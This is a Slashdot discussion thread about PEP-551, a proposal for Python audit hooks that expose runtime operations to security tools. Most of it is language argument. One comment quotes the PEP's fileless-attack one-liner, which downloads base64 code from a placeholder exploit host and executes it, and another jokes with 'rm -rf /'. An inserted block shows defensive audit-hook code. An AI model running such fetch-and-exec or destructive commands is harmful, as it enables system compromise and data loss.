Slashdot Mirror


Python May Let Security Tools See What Operations the Runtime Is Performing (bleepingcomputer.com)

An anonymous reader writes: A new feature proposal for the Python programming language wants to add "transparency" to the runtime and let security and auditing tools view when Python may be running potentially dangerous operations. In its current form, Python does not allow security tools to see what operations the runtime is performing. Unless one of those operations generates particular errors that may raise a sign of alarm, security and auditing tools are blind to the fact that an attacker may be using Python to carry out malicious operations on a system.

But in Python Enhancement Proposal 551 (PEP-551), Steve Dower, a core Python developer, has proposed the addition of two new APIs that will let security tools detect when Python is executing potentially dangerous operations. The first, the Audit Hook API, will raise warning messages about certain types of Python operations; while the second, the Verified Open Hook API, is a mechanism to let the Python runtime know what files it is permitted to execute or tamper with.

Initial plans were to have PEP-551 ship with Python 3.7, scheduled for release in mid-June 2018, but the proposal did not make the final cut, according to a list of new features added for next month's release. This doesn't mean PEP-551 won't ship with a future version of Python. This is the second major scripting engine to open its runtime to security tools, after PowerShell.

75 comments

  1. PEP-666 by Anonymous Coward · · Score: 1

    I'm patiently waiting to submit PEP-666 next April 1st.
    It's going to add curly braces!

    1. Re:PEP-666 by fluffernutter · · Score: 1

      IMHO, forced indentation is what makes Python readable. Matching curly brackets (that may or may not be there depending on single statement or multiple, and may not be aligned at all) makes code look terrible.

      --
      Laws are rules for the court, but merely a bottom bar to hit for life. Think beyond laws in your actions always.
    2. Re:PEP-666 by Anonymous Coward · · Score: 0

      For me the hard part is: Does python perform the dot operators from left to right or according to
      a rule of order (i.e., multiplication/division before add/subtract)?

      See further details here:
      https://groups.google.com/foru...

    3. Re:PEP-666 by Anonymous Coward · · Score: 0

      Indentation is what makes code readable. Forced indentation makes shitty Python code more readable, but not less shitty otherwise.

    4. Re:PEP-666 by Anonymous Coward · · Score: 0

      Monads make code readable. Indentation is a crutch.

    5. Re:PEP-666 by Anonymous Coward · · Score: 1

      Any time you have forced whitespace or whitespace between keywords the language is broken.
      Python and Make are the two most common horribly broken languages.

    6. Re:PEP-666 by Anonymous Coward · · Score: 0

      You are such a perfect miracle imbecile!

      I can't believe that you are actually imbecile enough to post this thread here. It makes you look like an even more imbecile fucktard yet.

      As some have stated on that thread "dot is NOT an operator", you fucktard! Apparently, you did not read the thread yourself or more likely, your ameba brain reading comprehension doesn't allow you to understand its content.

    7. Re:PEP-666 by Anonymous Coward · · Score: 0

      What a fucking pest!

      In the end, he managed to get regular contributors arguing between them and mess up the atmosphere again like he always does.

      TOXIC

    8. Re: PEP-666 by Anonymous Coward · · Score: 0

      Yet they're among the most successful tools because, contrary to your nonsensical claim, they actually work very well.

    9. Re:PEP-666 by Anonymous Coward · · Score: 0

      That's dumb, because you can program your IDE to omit the braces visually while being able to easily copy and paste blocks of code and automatically re-indent.

      If that's the killer feature of python, it was retarded to make a whole new language and waste collective developer effort on it (writing libraries, tools etc) when the indentation feature could have been written as an IDE plugin for a variety of languages instead, to get the same benefit with none of the downside.

    10. Re:PEP-666 by Anonymous Coward · · Score: 0

      Youshouldreviewyourcommentsbeforeposting.

      Actually, I think a language which allowed you to run-on keywords would be pretty disgusting, unless it was carefully designed so that keywords were anyway always separated by something else distinguishable from keywords.

      I do agree that as a language, "make" is pretty bad. And every time I have to write in "cmake", I curse their design decision not to have used any other scripting language which already existed rather than invent yet another dumb language. OTOH, that's probably because I write code in those languages a very small percentage of my development time --- otherwise, I might manage to become fluent enough that their lack of intuitiveness wouldn't bother me.

    11. Re:PEP-666 by Anonymous Coward · · Score: 0

      That's dumb, because you can program your IDE to omit the braces visually while being able to easily copy and paste blocks of code and automatically re-indent.

      Can I apologise for this rant in advance. Sorry, I know there are many other people who are just as bad and the designers of the Java language will pay more in hell than you, but:

      You are the evil in modern programming. The belief that very simple things should be magically hidden by or autocreated by the IDE when simple correct design would have made this all needless. The laziness which layers five different libraries one over the top of the other when just fixing the first one would have made everything right and debugging possible. You are the monkey patch in Ruby.

      When I next spend several days debugging a multilayered system problem where the bug is caused by a "clever" feature at one layer designed to hide the misfeature at a lower level that the developer could have just fixed in five minutes I will think of you. The curse I come up with at that moment will echo across the aeons. It will contain the strength of feeling of every Slashdotter who has ever dealt with a needlessly and gratuitously incomplete, badly designed and leaky abstraction layer.

    12. Re:PEP-666 by Anonymous Coward · · Score: 0

      Don't post it on Slashdot. Someone got banned from Slashdot for posting a parody video on April 1st. Management has no sense of humor whatsoever.

    13. Re:PEP-666 by fluffernutter · · Score: 1

      Oh yes, COBOL was broken. No success there.

      --
      Laws are rules for the court, but merely a bottom bar to hit for life. Think beyond laws in your actions always.
    14. Re: PEP-666 by Anonymous Coward · · Score: 0

      You got banned because you are a crybaby cuck who does nothing but spam the forums with trash affiliate links. Fuck off and back to McDonald's you fat fuck.

    15. Re: PEP-666 by Anonymous Coward · · Score: 0

      Problem is, the world is full of shitty code, and I'm often forced to read it.

  2. Re: Security Tools Will Never Catch by Anonymous Coward · · Score: 0

    Yes Boris! We pour vodka up prostitute assholes and drink as it sprays out!

  3. Who will watch the watchers? by Anonymous Coward · · Score: 1

    Tread carefully here: The morons who did WebRTC and the JavaScript Battery API didn't stop to think of the huge security loopholes they were opening up. People may well have died in oppressive regimes due to the arrogant shortsightedness of these twats.

    I'd like to see proper Sandboxing but those who have tried to add it have concluded you need to do it from the ground up. Not after the fact like Java did.

    1. Re:Who will watch the watchers? by Anonymous Coward · · Score: 0

      1) java and javascript are not the same, not even remotely, it is like comparing apples to moon rocks.

      2) webRTC is awesome, I am guessing you just heard the buzz word and do not even know what it is since you do not know the difference between java and javascript. Let me educate you:

      When you want a real time chat, or to send files to another person, or to do just about anything the webserver is a bottle neck. Data must flow client A to server then out to client B. With webRTC you form a direct connection from client A to client B and remove the webserver in the middle allowing direct data transfer. With this technology you can have a skype type website where people can voice/video chat and you can run the whole thing off a little 35$ raspberry pi because the webserver simply makes the data connection but no longer handles all the streaming data going back and forth.

    2. Re: Who will watch the watchers? by Anonymous Coward · · Score: 0

      What's your point?

    3. Re:Who will watch the watchers? by Anonymous Coward · · Score: 0

      1) java and javascript are not the same, not even remotely

      They're both shit, so there's that.

  4. Re: Security Tools Will Never Catch by Anonymous Coward · · Score: 0

    It helps to have some humor when you live in a former superpower that has a smaller economy than Italy's.

  5. Re:Security Tools Will Never Catch by K. S. Kyosuke · · Score: 1

    My first post operations.

    Your first post-op what?

    --
    Ezekiel 23:20
  6. So many things would have been preventable... by K. S. Kyosuke · · Score: 2

    ...if only Python had some semblance of sane design, like, e.g., Newspeak does, or other languages with an actual security model.

    --
    Ezekiel 23:20
    1. Re: So many things would have been preventable... by Anonymous Coward · · Score: 0

      You need to provide more details than that. It's a "programming language"... what security model/features would be needed?

    2. Re: So many things would have been preventable... by Anonymous Coward · · Score: 0

      Python is not a programming language it is a scripting language. You can call it a programming language when I can compile binaries out of it.

    3. Re: So many things would have been preventable... by Zero__Kelvin · · Score: 0

      Congratulations ... You win "most stupid post of the day" !

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    4. Re: So many things would have been preventable... by Anonymous Coward · · Score: 0

      You've been able to compile Python into binaries for years, idiot.

    5. Re: So many things would have been preventable... by Anonymous Coward · · Score: 0

      he means interpreted not binaries. But everyone but you knows this. it's common slang.

    6. Re: So many things would have been preventable... by Anonymous Coward · · Score: 0

      You can't make binaries that don't rely on 100MB worth of "libraries". Let's put it this way. When you can compile a bootloader out of it, it is a programming language, otherwise it's just another java.

    7. Re: So many things would have been preventable... by psmears · · Score: 1

      For what it's worth, Python can be used in a bootloader. OK, the bootloader's not actually written in Python (it's just GRUB), but looks like a cool project anyway :)

  7. Hmm, I might do a vim plugin for that by raymorris · · Score: 1

    You got me thinking, I just might seriously do a vim plugin to add and remove curly braces from Python code. I've coded in a lot of languages over many years, most of which use curly braces, so my eyes/brain process them somewhat automatically. I also use block-based operations in vim, which work based on curly braces. I might find it easier / faster to parse Python that had braces inserted temporarily.

    This wouldn't be needed if my co-workers didn't write blocks that are FAR longer than any coding standard recommends, but I've had limited success changing their habits. Instead of functions that do one simple thing, they like to write an entire 800-line program as one "function", except it's still not actually a function because it uses global variables from another file. Within their faketion they like to do this:

    if can work
          200 lines
                  eight levels deep
    else
          return error

    The only problem with writing such a plugin is that there are a lot of gotchas to finding the beginning and end of Python blocks. Other people have tried to write plugins to delimit Python blocks, but they all fail on real-world Python because a change in leading whitespace doesn't NECESSARILY mean a new block. Only sometimes.

    1. Re:Hmm, I might do a vim plugin for that by Anonymous Coward · · Score: 0

      Borrow from javascript, it has very sane end of logic rules ie " ; " to end.

      If you could also remove the need for those tabs, that would be fantastic, I indent my code with a space and some lines run way over to the right. If I added tabs to that they would run insanely far to the right to the point where it would be a nightmare scrolling over and then trying to memory connect that to what I was just looking at and thinking about.

    2. Re:Hmm, I might do a vim plugin for that by Anonymous Coward · · Score: 0

      if can work
            200 lines
                    eight levels deep
      else
            return error

      Those monsters!

      if !can work
          return error
       
      200 lines
                seven levels deep

      *sigh* 7 more levels to go

    3. Re:Hmm, I might do a vim plugin for that by Bongo · · Score: 1

      Good grief! I consider myself a total amateur, yet even I don’t do that.

  8. Re:Security Tools Will Never Catch by Anonymous Coward · · Score: 0

    post-op human, we started with an orangutan.

  9. Python needs semicolons by Anonymous Coward · · Score: 0

    Begone whitespace!

    1. Re:Python needs semicolons by The_Dougster · · Score: 1

      You need a semi-brain. Begone lest I taunt you some more.

      --
      Clickety Click ...
    2. Re:Python needs semicolons by Anonymous Coward · · Score: 0

      Umm, Python allows semicolons. They're just ignored.

    3. Re: Python needs semicolons by Anonymous Coward · · Score: 0

      That's badly broken behavior. Having an end of line character is important because it allows the programmer to split things across multiple lines for practical reasons. Properly done it can make code easier to read and easier to work with if you want to do something like temporarily ignore a part of a regex.

      Similarly, semantic white space is asking for trouble in cases where poorly configured software messed with it.

      Python just sucks. There really aren't two ways about it.

    4. Re: Python needs semicolons by Anonymous Coward · · Score: 0

      But Python does allow splitting things across multiple lines for practical reasons, and you don't even need a continuation character like some overly verbose languages.

    5. Re:Python needs semicolons by vtcodger · · Score: 3, Informative

      Python does not ignore semicolons. Python allows multiple, semicolon separated, statements on the same line.

      if YOU_REALLY_WANT_TO: print('Goodby World'); import sys; sys.exit(255)

      The Python Style Guide discourages that, but it's a guide, not a language rule.

      --
      You can't see ANYTHING from a car, You've got to get out of the goddamned contraption and walk...Edward Abbey
    6. Re: Python needs semicolons by SuperDre · · Score: 1

      I beg to differ, semicolons are just cluttering code up. If you need to split a line a character like _ would be good.
      To be honest, I still think the syntax of something like visual basic (classic), is one of the cleanest syntaxes around (I'm only referring to the syntax, not the language itself, that certainly needs some enhancements, haha).

    7. Re: Python needs semicolons by Anonymous Coward · · Score: 0

      It's not overly verbose. And by having the character you can rejoin the lines together if you really want to. Or,split them back into several ones using a simple regex.

      The use of syntactic white space and the like is a pox that needs to be scrubbed out of existence as quickly as possible. It doesn't necessarily have to be semicolons and curly braces, but you do need to be using some sort of characters to indicate code blocks specifically because that's something that you can easily use to identify blocks of code if you want to clean things via sed and regex.

    8. Re:Python needs semicolons by Anonymous Coward · · Score: 0

      Semicolons at the end of a line are the single most worthless thing I can think of.

  10. Just curious... by GerryGilmore · · Score: 1

    Has anyone shown any POC code that tricks out the Python runtime?
    Also, given that Python is all open-source, it would seem that the community which focuses on the runtime component (yes, I know it's the same guys proposing this - bear with me) would have pretty good checks on things, especially buffer overflows, etc.
    Having said that - and obviously not being a Python guru - I'm kinda surprised to learn that even with the amazing plethora of Python modules, there is not already a similar logging/tracing capability available. Yes! Full steam ahead!

    1. Re:Just curious... by Anonymous Coward · · Score: 0

      I believe this is to do with script code rather than the runtime itself. For example, the scripter is a malware writer and tries to infect with malware by overwriting malicious code into a certain file on the victim's system?

  11. Sandbox. operating system sandbox, please by goombah99 · · Score: 3, Interesting

    We're re-inventing resource specification sandboxes. The farther you push these things out to the edge rather than at the OS the less uniform policies you have. You become dependent on every app and every plugin the app trusts and every system function the app forks off to have a security policy that matches the one you want. Since you are not the app creator this can't ever happen.

    On the other hand if you can define the security policy of what resources an app and all its children can use then you can have a system wide or app-to-app tailored policy. And even then the app maker, who might know more than you do, could supply a pre-written "suggested" sandbox policy for their app. That is firefox could tell you what directories it will ever access and supply a sandbox for the OS to enforce it on itself. Likewise plugins that violate the norms can come with installers that update the sandbox for their extended needs beyond firefox. Since you can stack sandbox policies you can have a global one then the app specific one so even a hostile installer can't exceed some bounds.

    But don't keep trying to write the one-true-secure application (well do, but don't count on it), and don't put the policies in the interpreter.

    OSX has a sand box. Linux has a sandbox (dtrace). And I imagine Windows might even have one.

    The trouble is no one uses them regularly.

    --
    Some drink at the fountain of knowledge. Others just gargle.
  12. Oh, like MS Windows? by Anonymous Coward · · Score: 0

    The very proposal that a separate set of some kind of "security tool APIs" are needed indicates to me that something is seriously wrong, fundamentally. There should not be any need for any kind of a "security tool API" for a well-designed, secure, virtual machine.

    I am not aware of any kind of a "security tool API" floating around in the Perl ecosphere, and Perl is also a virtual machine-based programming language. Why is that? Why does Python need a "security tool API"? What exactly is so flawed with Python that it can potentially be insecure, and requires a "security tool API" bandaid?

    1. Re: Oh, like MS Windows? by Anonymous Coward · · Score: 0

      Perl needs it but tools like you are not going to add it.

  13. Already doable! by Gravis Zero · · Score: 1

    The easy way to accomplish this is to use a system language and a debugger. ;)

    On a serious note: do you really want a scripting language "executing potentially dangerous operations"? Seriously, think about it, they aren't signed text files and they are trivial to modify. Sure, there's no agreed upon ELF signing convention but at least it's significantly more difficult for a script to modify.

    I know I'll be burned at the stake by those who are in love with Python but that doesn't invalidate my points.

    --
    Anons need not reply. Questions end with a question mark.
    1. Re:Already doable! by Waffle Iron · · Score: 3, Insightful

      On a serious note: do you really want a scripting language "executing potentially dangerous operations"?

      You mean like:

      #! /bin/sh
      rm -rf /

    2. Re:Already doable! by Anonymous Coward · · Score: 0

      Uhh.. what? ELF binary format is trivial to modify by just about anything, including JavaScript (NodeJS) and Python. Add ten minutes for modification via Bash.

    3. Re: Already doable! by phantomfive · · Score: 2

      It would take you a week to write a tool to take apart an ELF file and add custom code to it. And of course, once the tool is written, you can do it as much as you want. That's how it is with security exploits: some are really tough, but if you write a tool, any script kiddie can exploit it.

      --
      "First they came for the slanderers and i said nothing."
  14. Yep by raymorris · · Score: 1

    Indeed. Just the other day I "adjusted" one of my co-worker's pull requests just like that. That got rid of two single-line conditional blocks which put the rest of their 200-300 line function two levels deeper than it needed to be.

    1. Re: Yep by Anonymous Coward · · Score: 0

      .. by using early returns.

      Some people would like a word with you.

  15. Re:Security Tools Will Never Catch by Anonymous Coward · · Score: 0

    Sex change.

  16. You want Python to be more like Rust? by Anonymous Coward · · Score: 0

    So you want Python to be more like Rust? You want it to be so awkward to use that it's nearly impossible to write insecure code, solely because it's nearly impossible to get the code to compile in the first place?

    1. Re:You want Python to be more like Rust? by K. S. Kyosuke · · Score: 1

      No, I'd like Python to be more like Newspeak. I would have thought that idea was clear enough in what I wrote, for example because I used "Python" and "Newspeak" in a single sentence, and, conversely, made no mention of Rust.

      --
      Ezekiel 23:20
  17. Want to improve Python application security? by Anonymous Coward · · Score: 0

    Want to improve Python application security? How about add some better compile-time checking like proper typed variable declarations, static type checking, static analysis and assertions. You know features that real languages like C, Ada, and even Java have had for a few decades.

    I think Python is a pretty garbage language and can't understand its popularity. Things like strong typing and more checking at compile time were learned to be good back in the 60's (e.g. Pascal is an improvement over Algol 68) and I guess we'll just learn those lessons again.

    This isn't trying to be flame bait -- I genuinely think Python is a scripting language that is being used as an application programming language and that's a bad idea.

    1. Re:Want to improve Python application security? by vtcodger · · Score: 2

      If you need static typing, you probably shouldn't be using Python. You might want to look into Perl which is similar to Python in many ways and has stricter variable typing. However, many (most?) folks find Perl code to be very difficult to read. Might have something to do with stricter typing. Or maybe it's something else.

      --
      You can't see ANYTHING from a car, You've got to get out of the goddamned contraption and walk...Edward Abbey
    2. Re:Want to improve Python application security? by Anonymous Coward · · Score: 0

      I'm a javascript developer, we hear endlessly from guys like you about typing in languages. I actually did not just learn javascript though but PHP, Cobol, c, c++, c# (which I cannot tell from .net which I cannot tell from VB) and java. I hated all of them because of their typed variable declarations and setting up declarations for variables instead of just whipping them up out of the blue and using them.

      I wonder what the difference is in our brains that makes it such a thing to even care about. Like what is it about my biochemistry that the organic nature of it comes easily and fluidly while for you the structure and hardened architecture give a sense of sturdiness and strength (perhaps? I am guessing).

      At any rate, I would have to say you are wrong but not for a technical reason, you are most likely right that typed variable declarations are architecturally superior. The reason you are wrong is because it feels wrong doing it, like using an electric hammer with a keypad instead of just a regular hammer. This is a 'gut' reason though, but the world follows the gut in many mysterious and little understood ways. The organic fluid easy nature of it allows more people to use it and to create and that boiling pot of additional developers allows for more amazing things to come to life at our fingertips every day making it a richer place for all of us.

    3. Re:Want to improve Python application security? by vtcodger · · Score: 1

      As a guy who did software QA for decades, I can tell you that a generally valid argument for strong typing is that it permits compile time checking for problems that otherwise won't be seen until unit test, or (worse) system test, or (much worse) production.

      As a programmer, I'm on your side. If I wanted constant aggravation, I'd have picked a different profession.

      --
      You can't see ANYTHING from a car, You've got to get out of the goddamned contraption and walk...Edward Abbey
  18. Re: Security Tools Will Never Catch by Anonymous Coward · · Score: 0

    This is SPARTA!!

    You, good sir, have challenged the internet to a fatal duel.

  19. Those people are wrong. Unless by raymorris · · Score: 1

    A single return is good if you write 4-20 line functions, which is common in many communities, and I favor that style.

    If you're going to have a 200-line function, it's better to do your input validation and "exception handling" up front like this:

    if (denominator == 0 ||
    denominator == null ||
    numerator == null) {
          return error
    }

    Rather than have your entire 200-line body three levels deeper than it needs to be, putting some blocks 6 or 8 levels deep. Of course actual exception handling is another conversation.

  20. NIce product by Anonymous Coward · · Score: 0

    Nice idea

  21. What is this anyway? by vtcodger · · Score: 4, Informative

    I read through the comments and still didn't have a clue what the article is about. So I took the drastic step of actually reading the PEP.

    AFAICS, What is proposed is that the Python runtime provide some hooks that allow system administrators to observe/log some events occurring in scripts. That's useful because Python provides access to just about anything one might want to do via dynamically loadable modules.

    Will it actually be usable for anything? I haven't a clue. My gut feeling is probably not very. But what do I know?

    Can it be used for evil? Probably. But I should think that the risk from malicious modules and code vastly outweighs any additional risk from these hooks.

    --
    You can't see ANYTHING from a car, You've got to get out of the goddamned contraption and walk...Edward Abbey
    1. Re:What is this anyway? by thesupraman · · Score: 1

      Isn't the larger question really 'why'?
      As in why would python try and do what is done, for very good reasons, at OS level already, and if it is not, things are completely broken anyway?

      After all there is that tiny little loophole of C extensions, or hell, just writing the nasty programs in C (or just about any other language) to begin with?

      I basically read this as 'Python has a HUGE problem because it works like pretty much every other language out there, quick, fix it!'

      ie: someone stirring up a storm in a teacup to get their personal pet project fasttracked in to the core.

    2. Re:What is this anyway? by vtcodger · · Score: 1

      We're way beyond my tiny area of competence here, but PEP551 https://www.python.org/dev/pep... includes an example:

      python -c "import urllib.request, base64;
              exec(base64.b64decode(
                      urllib.request.urlopen('http://my-exploit/py.b64')
              ).decode())"

      The PEP asserts that sort of thing bypasses (most) malware scanners and file access controls because there is no file written to disk. Could be. The problem from the sys admin point of view is that you (hypothetically) can't just forbid running Python scripts because you have users in accounting, shipping, marketing, etc that need Python in order to do their job. The language is everywhere. And there is no real provision for distinguishing OK Python from malicious Python.

      The PEP apparently provides some capability to spot Python scripts doing stuff that seems suspicious. I'm hazy on how. For details, try the PEP.

      --
      You can't see ANYTHING from a car, You've got to get out of the goddamned contraption and walk...Edward Abbey
    3. Re:What is this anyway? by ElizabethGreene · · Score: 2

      PowerShell has similar functionality, and I can speak a little on why they did it.

      "Normal" AV looks at files. You read a file and it's scanned. You write a file and it's scanned. File-less attacks nullify this approach by never dropping anything to the disk. They call PowerShell (or Python, apparently) by passing in a script block, the equivalent of a one-liner that is Eval()'d. To help close this hole and expose scriptblocks to AV PowerShell added features to decode incoming scriptblocks, log them, and explicitly expose to AV before executing them.

      It looks like Python is doing the same. Good for them.

      Ref: https://blogs.technet.microsof...
      Disclaimer: I work for Microsoft as a Windows Platforms PFE, therefore my opinion is invalid. This post is my own work and understanding, and is probably wrong.
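
The mechanism discussed in the two comments above, as an added example that is not part of any comment or of the PEP: an audit hook that records code compiled and executed from a string with no file on disk. It assumes Python 3.8 or later, where a runtime audit hook can be registered with `sys.addaudithook`; the helper names (`observe`, `fileless_sample`) are hypothetical, and the base64 payload is a constructed, harmless stand-in for the downloaded one.

```python
import base64
import sys

# Constructed sample: harmless source, base64-encoded the way the one-liner
# quoted above would receive it. Nothing is fetched and nothing is written.
SAMPLE_B64 = base64.b64encode(b"answer = 6 * 7  # constructed payload\n")

_findings = []       # (event, detail) tuples recorded by the hook
_installed = False   # audit hooks cannot be removed, so register only once


def _hook(event, args):
    """Called by the runtime for every audited operation.

    Must stay cheap and must not raise: an exception raised here aborts
    the operation that triggered the event.
    """
    if event == "compile":
        source, filename = args[0], args[1]
        # Source text that is not backed by a file: log it before it runs,
        # after any base64 layer has already been peeled off by the caller.
        if source is not None and filename == "<string>":
            if isinstance(source, bytes):
                source = source.decode("utf-8", "replace")
            _findings.append(("compile", str(source)[:200]))
    elif event == "exec":
        code = args[0]
        # exec()/eval() of a code object that did not come from a file.
        if getattr(code, "co_filename", "") == "<string>":
            _findings.append(("exec", code.co_filename))
    elif event == "urllib.Request":
        # Raised by urllib.request.urlopen; not exercised in this offline demo.
        _findings.append(("urllib.Request", str(args[0])))


def install():
    """Register the hook for the current interpreter (idempotent)."""
    global _installed
    if not _installed:
        sys.addaudithook(_hook)
        _installed = True


def observe(fn):
    """Run fn() with the hook active and return the findings it produced."""
    install()
    start = len(_findings)
    fn()
    return _findings[start:]


def fileless_sample():
    """Same shape as the quoted one-liner, minus the network fetch."""
    exec(base64.b64decode(SAMPLE_B64).decode())


if __name__ == "__main__":
    for event, detail in observe(fileless_sample):
        print(event, "->", detail.strip())
```

Ordinary library code also calls `exec` on strings, so a real deployment would forward these records to a log or scanner for triage rather than treat each one as an alert.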

    4. Re:What is this anyway? by Anonymous Coward · · Score: 0

      We had it too good with Python for too long. It is time "security" tools stepped in and questioned if what we are doing is really good for us. From time to time every Python program will be stopped and a modal dialogue window will pop up and prompt that Mcafee-Norton detected a potentially dangerous operation that must cease and desist. Of course your friendly sysadmin is free to manually click through 20 layers of menus and manually disable this alert for every machine he/she happens to admin. I wonder why Python maintainers even agreed to this.

  22. And the malware tools to use those APIs by whitroth · · Score: 1

    ... will be available the day before the standard's officially released.